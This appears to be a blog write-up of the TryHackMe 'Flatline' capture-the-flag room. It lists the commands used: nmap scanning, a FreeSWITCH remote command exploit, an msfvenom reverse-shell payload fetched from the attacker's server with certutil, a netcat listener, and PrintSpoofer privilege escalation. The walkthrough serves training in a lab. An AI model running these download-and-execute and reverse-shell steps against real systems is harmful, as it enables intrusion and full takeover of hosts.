Flatline – Walkthrough En | TryHackMe – Write-up

How low are your morals?

 

Flatline is a CTF easy ofTryHackme. It’s all classic. Enumeration, find exploit, perform privilege escalation.

Enumeration

Command :

nmap -sV -sC -p- -T5 10.10.135.236 -Pn

There is a service running on port 8021. It’s freeswitch.

Vulnerability research – freeswitch : 

searchsploit freeswitch

The 47799.txt file contains an exploit written in python. You have to rename it to .py

Command :

mv 47799.txt 47799.py

Initial Foothold

Does the exploit work? Is the service vulnerable. We don’t get a lot of information about the service itself. The only way to find out is to test…

Command :

python3.9 47799.py 10.10.135.236 whoami

Resultat :

The exploit works. We were able to get the name of the user running the service.

It now takes the exploit to get a reverse shell.

Creating a payload

Command :

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.38.124 LPORT=4444 -f exe -o sr.exe

downloading the payload to the target

Setting up a Kali web server :

python3.9 -m http.server 8787

Command :

python3.9 47799.py 10.10.135.236 ‘certutil -urlcache -split -f http://10.11.38.124:8787/sr.exe

 

Payload execution

Setting up a netcat listener :

nc -nlvp 4444

Command :

python3.9 47799.py 10.10.135.236 ‘sr.exe’

Receiving the reverse shell :

Escalade de privilège.

Command :

whoami /priv

User has SeImpersonatePrivilege rights.

 

Printerspoofer

To increase its privileges via SeImpersonatePrivilege, it is possible to use the exploit printerspoofer.exe available at this address. 

Download :

certutil -urlcache -split -f http://10.11.38.124:8787/PrintSpoofer.exe

 

Commande :

PrintSpoofer.exe -i -c cmd

Please note that the command may not work the first time. Do not hesitate to restart it several times.

#

That’s all folks

Thank you for taking the trouble to come to the site to read this Write-Up

I hope he liked you more and that he taught you new things.

Feel free to leave a comment or share this article.

Facebook
Twitter
LinkedIn
Pinterest